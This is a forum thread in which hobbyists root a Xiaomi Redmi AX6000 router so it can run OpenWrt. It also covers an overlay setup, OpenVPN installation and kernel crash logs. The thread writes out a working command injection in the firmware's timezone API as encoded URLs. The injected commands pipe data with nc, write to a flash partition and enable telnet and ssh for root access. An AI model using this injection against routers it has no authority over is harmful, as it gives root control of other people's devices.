Add OpenWrt support for Xiaomi "Redmi AX6000"

Not sure I understand. I double checked the encoding and tried with bdata set telnet_en=1 ; bdata set ssh_en=1 ; bdata commit (notice the =), telnet still won't accept my connection (port shows closed).

I also know that the vulnerability is working, http://192.168.31.1/cgi-bin/luci/;stok={token}/api/misystem/set_sys_time?timezone=%20%27%20%3b%20reboot%20%3b%20 reboots the device

1 Like

No luck yet, for reference I did bdata show | nc <computer ip> 1234

http://192.168.31.1/cgi-bin/luci/;stok={token}/api/misystem/set_sys_time?timezone=%20%27%20%3B%20bdata%20show%20%7C%20nc%20{computer ip}%201234%20%3B%20
rand_key=*redacted*
rand_nonce=*redacted*
SN=*redacted*
color=100
CountryCode=CN
model=RB06
ethaddr=*redacted*
ethaddr_wan=*redacted*
miot_did=*redacted*
miot_key=*redacted*
wl1_ssid=*redacted*
wl0_ssid=*redacted*
telnet_en=0
ssh_en=0
uart_en=0

shows they're still 0 after 3rd reboot. Directly after the command to set bdata, telnet_en and ssh_en are set to 1 but revert to 0 after reboot

1 Like

It looks like encoding \xa5\x5a\x00\x00 is not working correctly.

dd if=/dev/mtd6 | hexdump -C | nc {computer ip} 1234

http://192.168.31.1/cgi-bin/luci/;stok={token}/api/misystem/set_sys_time?timezone=%20%27%20%3B%20dd%20if%3D%2Fdev%2Fmtd6%20%7C%20hexdump%20-C%20%7C%20nc%20{computer_ip}%201234%20%3B%20

I get this returned:

00000000  31 39 30 30 ff ff ff ff  ff ff ff ff ff ff ff ff  |1900............|
00000010  ff ff ff ff ff ff ff ff  ff ff ff ff ff ff ff ff  |................|
*
1 Like

This works:

1.Write \xa5\x5a\x00\x00 to crash partition (magic bytes)

  • Create magic bytes file (it's very difficult at best to encode raw bytes and send over http):
    echo -n -e '\xa5\x5a\x00\x00' > magic_bytes.bin

  • On pc create nc listener:
    nc -l 1234 < magic_bytes.bin

  • Copy binary to router: nc {computer_ip} {port} > /tmp/magic_bytes.bin
    http://192.168.31.1/cgi-bin/luci/;stok={token}/api/misystem/set_sys_time?timezone=%20%27%20%3b%20nc%20{computer_ip}%20{port}%20%3E%20%2Ftmp%2Fmagic_bytes.bin%20%3b%20

  • Write binary to crash partition (mtd6): cat /tmp/magic_bytes.bin | mtd write - crash
    http://192.168.31.1/cgi-bin/luci/;stok={token}/api/misystem/set_sys_time?timezone=%20%27%20%3b%20cat%20%2Ftmp%2Fmagic_bytes.bin%20%7C%20mtd%20write%20-%20crash%20%3b%20

  • Reboot: reboot
    http://192.168.31.1/cgi-bin/luci/;stok={token}/api/misystem/set_sys_time?timezone=%20%27%20%3b%20reboot%20%3b%20

  1. Set bdata
  • Enable telnet, ssh and commit: bdata set telnet_en=1 ; bdata set ssh_en=1 ; bdata commit
    http://192.168.31.1/cgi-bin/luci/;stok={token}/api/misystem/set_sys_time?timezone=%20%27%20%3B%20bdata%20set%20telnet_en%3D1%20%3B%20bdata%20set%20ssh_en%3D1%20%3B%20bdata%20commit%20%3B%20

  • Reboot: reboot
    http://192.168.31.1/cgi-bin/luci/;stok={token}/api/misystem/set_sys_time?timezone=%20%27%20%3b%20reboot%20%3b%20

  1. Reset crash partition
  • Erase crash partition: mtd erase crash
    http://192.168.31.1/cgi-bin/luci/;stok={token}/api/misystem/set_sys_time?timezone=%20%27%20%3b%20mtd%20erase%20crash%20%3b%20

Annnnnnd, telnet!

% telnet 192.168.31.1
Trying 192.168.31.1...
Connected to 192.168.31.1.
Escape character is '^]'.

XiaoQiang login: 

To get root password, follow same as AX3600: https://github.com/YangWang92/AX6S-unlock/raw/master/unlock_pwd.py

BusyBox v1.25.1 (2022-03-29 17:31:07 UTC) built-in shell (ash)

 -----------------------------------------------------
       Welcome to XiaoQiang!
 -----------------------------------------------------
  $$$$$$\  $$$$$$$\  $$$$$$$$\      $$\      $$\        $$$$$$\  $$\   $$\
 $$  __$$\ $$  __$$\ $$  _____|     $$ |     $$ |      $$  __$$\ $$ | $$  |
 $$ /  $$ |$$ |  $$ |$$ |           $$ |     $$ |      $$ /  $$ |$$ |$$  /
 $$$$$$$$ |$$$$$$$  |$$$$$\         $$ |     $$ |      $$ |  $$ |$$$$$  /
 $$  __$$ |$$  __$$< $$  __|        $$ |     $$ |      $$ |  $$ |$$  $$<
 $$ |  $$ |$$ |  $$ |$$ |           $$ |     $$ |      $$ |  $$ |$$ |\$$\
 $$ |  $$ |$$ |  $$ |$$$$$$$$\       $$$$$$$$$  |       $$$$$$  |$$ | \$$\
 \__|  \__|\__|  \__|\________|      \_________/        \______/ \__|  \__|


root@XiaoQiang:~# 
root@XiaoQiang:~# cat /etc/openwrt_release 
DISTRIB_ID='OpenWrt'
DISTRIB_RELEASE='18.06-SNAPSHOT'
DISTRIB_REVISION='unknown'
DISTRIB_TARGET='mediatek/mt7986'
DISTRIB_ARCH='aarch64_cortex-a53'
DISTRIB_DESCRIPTION='OpenWrt 18.06-SNAPSHOT unknown'
DISTRIB_TAINTS='no-all busybox'
root@XiaoQiang:~# id
uid=0(root) gid=0(root) groups=0(root)
root@XiaoQiang:~# uname -a
Linux XiaoQiang 5.4.150 #0 SMP Tue Mar 29 16:56:29 2022 aarch64 GNU/Linux```
14 Likes

Great! Important discovery.

1 Like

I was able to make a build of OpenWrt for BananaPi-R3 that was added by @daniel last week, drop into AX6000 u-boot console, tftpboot initramfs-recovery and voila!

BusyBox v1.35.0 (2022-09-05 09:46:47 UTC) built-in shell (ash)

  _______                     ________        __
 |       |.-----.-----.-----.|  |  |  |.----.|  |_
 |   -   ||  _  |  -__|     ||  |  |  ||   _||   _|
 |_______||   __|_____|__|__||________||__|  |____|
          |__| W I R E L E S S   F R E E D O M
 -----------------------------------------------------
 OpenWrt SNAPSHOT, r0+20481-09ea1db93b
 -----------------------------------------------------
=== WARNING! =====================================
There is no root password defined on this device!
Use the "passwd" command to set up a new password
in order to prevent unauthorized SSH logins.
--------------------------------------------------
root@OpenWrt:/# uname -a
Linux OpenWrt 5.15.64 #0 SMP Tue Sep 6 10:15:48 2022 aarch64 GNU/Linux

OpenWrt running on a Redmi AX6000!

FWIW: on a uart console, spam ctrl-c immediately after power on and you'll drop into u-boot.

I need to get a good start on a dts now. I've already started here, but I'm about at the edge of my knowledge: https://github.com/soxrok2212/openwrt/blob/master/target/linux/mediatek/dts/mt7986a-xiaomi-redmi-router-ax6000.dts

As it stands, it builds but images made with it do not boot.

6 Likes

These will work and no need to use nc (But I didn't write the original.)

http://192.168.31.1/cgi-bin/luci/;stok={token}/api/misystem/set_sys_time?timezone=%20%27%20%3B%20zz%3D%24%28dd%20if%3D%2Fdev%2Fzero%20bs%3D1%20count%3D2%202%3E%2Fdev%2Fnull%29%20%3B%20printf%20%27%A5%5A%25c%25c%27%20%24zz%20%24zz%20%7C%20mtd%20write%20-%20crash%20%3B%20

reboot

2.http://192.168.31.1/cgi-bin/luci/;stok={token}/api/misystem/set_sys_time?timezone=%20%27%20%3B%20bdata%20set%20telnet_en%3D1%20%3B%20bdata%20set%20ssh_en%3D1%20%3B%20bdata%20commit%20%3B%20

reboot

3.http://192.168.31.1/cgi-bin/luci/;stok={token}/api/misystem/set_sys_time?timezone=%20%27%20%3b%20mtd%20erase%20crash%20%3b%20

reboot

I don't know why the nc prompt transmission is complete and all the web pages return code0, but I can't crack it.

2 Likes

@soxrok2212 and @PussAzuki , tell me, in what mode did you have a router when you exploited the vulnerability?
It is defined like this:

uci get xiaoqiang.common.NETMODE
uci get xiaoqiang.common.CAP_MODE
uci get xiaoqiang.common.MESH_VERSION

I'm also interested in this information:
http://192.168.31.1/cgi-bin/luci/;stok={token}/api/xqnetwork/get_netmode
netmode enum:
0 = ???
1 = "wifiapmode"
2 = "lanapmode"
3 = "whc_re"
4 = "whc_cap"
100 = recovery mode

图片

after check, I got this.

Hello! Can anyone see if there is OpenVPN in the stock firmware?

opkg list | grep openvpn 
root@XiaoQiang:/# opkg list | grep openvpn                                      
root@XiaoQiang:/# 

Negative, sir.

1 Like
root@XiaoQiang:/# uci get xiaoqiang.common.NETMODE
whc_cap
root@XiaoQiang:/# uci get xiaoqiang.common.CAP_MODE
uci: Entry not found
root@XiaoQiang:/# uci get xiaoqiang.common.MESH_VERSION
4

Thank you! It is a pity of course that OpenVPN is not installed. As I understand it, it's easy not to install it in the stock firmware.

It's based on 18.06.0 so you may be able to set up the appropriate opkg sources and install it that way. Otherwise, wait for a real OpenWrt image. Think (slightly over) the majority of the heavy lifting is done here.

I'm looking forward to the real openwrt image. I just read about xiaomi ax6000 (not redmi) that there is no free space and there is no way to delete something due to the read-only system partition. When my redmi AX6000 comes to me, I will definitely try to install openvpn. Thank you.

Does not allow to install openvpn, says there is no free space. I will be waiting for the real openwrt image.

root@XiaoQiang:~# opkg install openvpn-openssl openvpn-easy-rsa
Installing openvpn-openssl (2.4.5-4.2) to root...
Installing openvpn-easy-rsa (3.0.4-1) to root...
Collected errors:
 * verify_pkg_installable: Only have 0kb available on filesystem /overlay, pkg openvpn-openssl needs 180
 * opkg_install_cmd: Cannot install package openvpn-openssl.
 * verify_pkg_installable: Only have 0kb available on filesystem /overlay, pkg openvpn-easy-rsa needs 17
 * opkg_install_cmd: Cannot install package openvpn-easy-rsa.

you have to mount overlay first.
here's tutorial(not tested on AX6000 yet):
https://www.right.com.cn/forum/thread-4060726-1-1.html

in case you don't understand Chinese, here's translation:

  1. create /etc/init.d/miwifi_overlay with contents below (vi /etc/init.d/miwifi_overlay, i, paste, :wq)
#!/bin/sh /etc/rc.common

START=00

. /lib/functions/preinit.sh

start() {
        [ -e /data/overlay ] || mkdir /data/overlay
        [ -e /data/overlay/upper ] || mkdir /data/overlay/upper
        [ -e /data/overlay/work ] || mkdir /data/overlay/work

        mount --bind /data/overlay /overlay
        fopivot /overlay/upper /overlay/work /rom 1

        #Fixup miwifi misc, and DO NOT use /overlay/upper/etc instead, /etc/uci-defaults/* may be already removed
        /bin/mount -o noatime,move /rom/data /data 2>&-
        /bin/mount -o noatime,move /rom/etc /etc 2>&-
        /bin/mount -o noatime,move /rom/ini /ini 2>&-
        /bin/mount -o noatime,move /rom/userdisk /userdisk 2>&-

        return 0
}

2.chmod 755 /etc/init.d/miwifi_overlay
3. /etc/init.d/miwifi_overlay enable
4. sync
5. reboot
after reboot, you may able to use opkg install. if you update firmware, you should repeat steps above

2 Likes

This looks like a ton of progress. It's probably time to finally replace my tried-and-true WRT1900AC. I'm thinking of getting myself an AX6000 as it seems to be the best device available today, with a good perspective to run OpenWrt in the near future.

Unfortunately, I'm not a developer by any means, and my Linux knowledge is limited. But I'm used to running trunk builds (when created by others) and hopefully will be able to help with testing and validation.

1 Like

Can it change to US country code for higher tx power?

I got it starting to boot a dedicated build, however it appears to have issues with pcie. Likely a dts issue :confused:

   0.860083] pstore: Using crash dump compression: deflate
[    0.869863] mtk-pcie-gen3 11280000.pcie: host bridge /soc/pcie@11280000 ranges:
[    0.877201] mtk-pcie-gen3 11280000.pcie: Parsing ranges property...
[    0.883457] mtk-pcie-gen3 11280000.pcie:      MEM 0x0020000000..0x002fffffff -> 0x0020000000
[    1.103091] mtk-pcie-gen3 11280000.pcie: PCIe link down, ltssm reg val: 0x1000001
[    1.110586] mtk-pcie-gen3: probe of 11280000.pcie failed with error -110
[    1.134928] Unable to handle kernel NULL pointer dereference at virtual address 00000000000000ac
[    1.143703] Mem abort info:
[    1.146483]   ESR = 0x96000005
[    1.149523]   EC = 0x25: DABT (current EL), IL = 32 bits
[    1.151516] mt7530 mdio-bus:00: configuring for fixed/2500base-x link mode
[    1.154816]   SET = 0, FnV = 0
[    1.154818]   EA = 0, S1PTW = 0
[    1.154819]   FSC = 0x05: level 1 translation fault
[    1.154822] Data abort info:
[    1.154823]   ISV = 0, ISS = 0x00000005
[    1.154825]   CM = 0, WnR = 0
[    1.154826] [00000000000000ac] user address but active_mm is swapper
[    1.154830] Internal error: Oops: 96000005 [#1] SMP
[    1.162116] mt7530 mdio-bus:00: Link is Up - 2.5Gbps/Full - flow control rx/tx
[    1.164719] Modules linked in:
[    1.164724] CPU: 0 PID: 286 Comm: irq/69-mt7530 Not tainted 5.15.64 #0
[    1.171458] mt7530 mdio-bus:00 wan (uninitialized): PHY [mt7530-0:01] driver [MediaTek MT7531 PHY] (irq=127)
[    1.172706] Hardware name: Xiaomi Redmi Router AX6000 (DT)
[    1.185499] mt7530 mdio-bus:00 lan1 (uninitialized): PHY [mt7530-0:02] driver [MediaTek MT7531 PHY] (irq=128)
[    1.188663] pstate: 800000c5 (Nzcv daIF -PAN -UAO -TCO -DIT -SSBS BTYPE=--)
[    1.203161] mt7530 mdio-bus:00 lan2 (uninitialized): PHY [mt7530-0:03] driver [MediaTek MT7531 PHY] (irq=129)
[    1.203752] pc : handle_nested_irq+0x34/0x1c0
[    1.219896] mt7530 mdio-bus:00 lan3 (uninitialized): PHY [mt7530-0:04] driver [MediaTek MT7531 PHY] (irq=130)
[    1.220053] lr : handle_nested_irq+0x14/0x1c0
[    1.226428] DSA: tree 0 setup
[    1.235401] sp : ffffffc00d89bd30
[    1.235403] x29: ffffffc00d89bd30 x28: ffffff80000542e0 x27: 0000000000000000
[    1.235409] x26: ffffff80000542ac x25: ffffffc008087454 x24: ffffff80051cf600
[   1.291251] x23: 00000000000000ac x22: ffffff80008ce540 x21: 0000000000000008
[    1.291488] Freeing unused kernel memory: 448K
[    1.298284] x20: 0000000000000000 x19: 0000000000000003 x18: 00000000bbc363b3
[    1.298290] x17: 0000000000000005 x16: 0000000000000001 x15: 0000000000000000
[    1.298295] x14: 0000000000000000 x13: ffffffc008827660 x12: 00000000fa83b2da
[    1.324048] x11: 0000000000000040 x10: ffffffc008b4a2a8 x9 : ffffffc008b4a2a0
[    1.331164] x8 : ffffff8000400270 x7 : 0000000000000000 x6 : 0000000000000000
[    1.338280] x5 : ffffff8000400248 x4 : ffffff8000400270 x3 : 0000000000000000
[    1.345395] x2 : 0000000000000001 x1 : 0000000000000000 x0 : 0000000000000000
[    1.352510] Call trace:
[    1.354942]  handle_nested_irq+0x34/0x1c0
[    1.358936]  mt7530_irq_thread_fn+0x98/0xa0
[    1.363106]  irq_thread_fn+0x28/0x8c
[    1.366666]  irq_thread+0x118/0x220
[    1.370138]  kthread+0x11c/0x130
[    1.373355]  ret_from_fork+0x10/0x20
[    1.376919] Code: d2800000 9102b297 52800022 f98002f1 (885ffee1) 
[    1.382992] ---[ end trace 2d60a5c2f4f20605 ]---
[    1.389212] Kernel panic - not syncing: Oops: Fatal exception
[    1.394937] SMP: stopping secondary CPUs
[    1.398844] Kernel Offset: disabled
[    1.402316] CPU features: 0x00000000,20000802
[    1.406656] Memory Limit: none
[    1.411322] Rebooting in 1 seconds..

Was an issue with my eth node. Got it booted without that. Need to correct it.

2 Likes